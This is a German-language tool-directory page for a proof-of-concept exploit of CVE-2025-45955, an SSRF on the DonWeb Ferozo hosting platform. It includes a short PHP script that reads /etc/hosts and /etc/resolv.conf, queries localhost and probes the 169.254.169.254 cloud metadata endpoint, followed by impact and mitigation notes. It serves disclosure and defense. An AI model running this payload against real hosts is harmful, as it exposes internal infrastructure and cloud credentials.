Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-45955 — Proof-of-Concept-Exploit für CVE-2025-45955, der Server-Side Request Forgery (SSRF) auf der DonWeb Ferozo Hosting-Plattform demonstriert und die Kartierung interner Infrastruktur sowie die Aufzählung von Cloud-Metadaten ermöglicht. | Kitploit
Tools/GitHubGitHub/surendrapuppala7/cve-2025-45955
AufklärungSchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitCloud-Sicherheit
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

Proof-of-Concept-Exploit für CVE-2025-45955, der Server-Side Request Forgery (SSRF) auf der DonWeb Ferozo Hosting-Plattform demonstriert und die Kartierung interner Infrastruktur sowie die Aufzählung von Cloud-Metadaten ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
13vor 8 MonatenNoch nicht geprüft

CVE-2025-45955

Server-Side Request Forgery in DonWeb Ferozo (CVE-2025-45955)

Beschreibung

Ein Angreifer kann diese Schwachstelle ausnutzen, indem er eine speziell präparierte PHP-Datei auf der Ferozo-Hosting-Plattform hochlädt und ausführt. Beim Zugriff startet die Datei eine Reihe von SSRF-Versuchen, die auf interne Dienste (wie 127.0.0.1, 169.254.169.254 oder Service-Mesh-Endpunkte), lokale Dateien (z.B. file:///etc/passwd) und bekannte Cloud-Metadaten-Endpunkte abzielen. Das Skript sammelt Antworten oder Fehlermeldungen, sodass der Angreifer die interne Infrastruktur kartieren, zugängliche Dienste auflisten und vertrauliche Informationen für eine weitere Ausnutzung sammeln kann.

Proof of Concept (PoC)

Der folgende Code demonstriert die Schwachstelle:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

Betroffene Komponente

  • Ferozo Hosting-Plattform (DonWeb)
  • PHP-basierte Umgebungen, die das Hochladen oder die Ausführung von benutzergesteuerten PHP-Dateien erlauben

Auswirkungen

  • Informationsoffenlegung: Preisgabe interner IPs, Dateiinhalte, Cloud-Metadaten-Endpunkte
  • Infrastruktur-Aufklärung: Ermöglicht Port- und Dienst-Enumeration (Docker, Kubelet usw.)
  • Potenzial für Cloud-Ausbeutung: Durchsucht bekannte Metadaten-Endpunkte wie AWS, GCP und Alibaba
  • Verkettungsmöglichkeit: Kann mit anderen lokalen Schwachstellen für RCE oder Pivoting kombiniert werden

Abhilfemaßnahmen

  • Einschränkung von Dateieinbindungs- und URL-Zugriffsfunktionen (file_get_contents, fopen usw.)
  • Blockieren des Zugriffs auf interne IP-Bereiche (127.0.0.0/8, 169.254.169.254 usw.) durch ausgehende Firewall-Regeln
  • Überprüfung und Bereinigung von Benutzereingaben, die Dateipfade oder URLs beeinflussen können

CVE-ID

CVE-2025-45955


Entdecker

Gemeldet von [Facundo Fernandez, Jinook Kim, Surendra Puppala / Sicherheitsforscher | @BYU]

Tool herunterladen